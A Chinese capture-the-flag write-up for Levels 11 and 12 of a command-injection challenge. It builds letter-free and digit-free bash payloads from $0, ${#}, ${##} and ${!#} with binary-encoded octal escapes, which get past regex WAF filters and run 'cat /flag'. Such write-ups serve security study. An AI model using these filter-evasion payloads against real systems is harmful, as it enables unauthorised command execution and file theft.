当前位置：首页 > news >正文

国内商城网站建设中铁建设集团门户员工登录

news 2025/9/25 8:56:54

国内商城网站建设,中铁建设集团门户员工登录,企业展厅设计哪里好,室内设计高端网站Level 11 分析源码主要关注 preg_match("/[A-Za-z1-9\"%*,-.\/:;>?[\]^|]/", $cmd) 过滤字符的变化发现比起上一关, 这一关可以使用的数字只有 0归纳一下, 能用的字符有 #, $, (, ), 0, <, \, {, } 解题分析而没有了 1, 怎么表示二进制呢?这个时…

Level 11

分析源码

主要关注 preg_match("/[A-Za-z1-9\"%*+,-.\/:;=>?@[\]^|]/", $cmd)` 过滤字符的变化
发现比起上一关, 这一关可以使用的数字只有 0
归纳一下, 能用的字符有
- #, $, (, ), 0, <, \, {, }

解题分析

而没有了 1, 怎么表示二进制呢?
这个时候就需要使用间接扩展特性中的${#xxx}, 它用于表示变量 xxx 存储的字符串长度
- 如
```
sh-5.1# a=1
sh-5.1# echo ${#a}
1
```

而前几关提到 ${#}代表传递给当前脚本的参数个数, 虽说他没有办法作为 1 使用, 但是 # 可以作为变量, 而其存储的 0 的长度为 1

sh-5.1# echo $#
0
sh-5.1# echo ${##}
1

所以我们只需要把上关的 Paylaod 中的 1, 全部换为 ${##} 即可

上关的Payload为

$0<<<$0\<\<\<\$\'\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))\'

替换后为

$0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}000${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}0${##}00${##}00))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}0))\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}${##}))\'

解题步骤

似乎出题人察觉到了, GET请求的最大长度已经不满足于现在的Payload了(后面查了一下, 发现其实距离超出限制还远远不到)
所以这一关采用了 POST 请求(应该是省的URL转换吧)
当然也就不在需要使用 URL编码了

请添加图片描述

Level 12

源码分析

这一关并未给出源码
- 似乎是因为本关考察点在 PHP 的 system 中并不支持
- 所以在 Python 的 Flask 环境下使用subprocess模块来执行命令
- 并给我们一个虚拟终端

不过还是告诉了 WAF 是什么

"WAF:[A-Za-z0-9"%*+,-.\/:;=>?@[\]^`|&_~]"

也就是说这一关中, 任何一个数字都使用不了了
不过以下几个符号还是可以使用的
```
! # $ ' ( ) < \ { }
```

解题分析

这里就要使用间接扩展特性中的${!xxx}, 它表示用xxx的值作为另一个变量的名字, 然后取出那个变量的值
- 如
```
sh-5.1# a=0
sh-5.1# echo ${!a}
/bin/sh
```
- 即 ${!a} 就相当于 $0
- 这样就找到 $0 代替 bash 的平替了
然后 ${#} 为传递给当前脚本的参数个数, 也就是 0

现在就可以把上一关的 Payload 拿来修改了

$0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}000${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}0${##}00${##}00))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}0))\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}${##}))\'

修改后

${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\'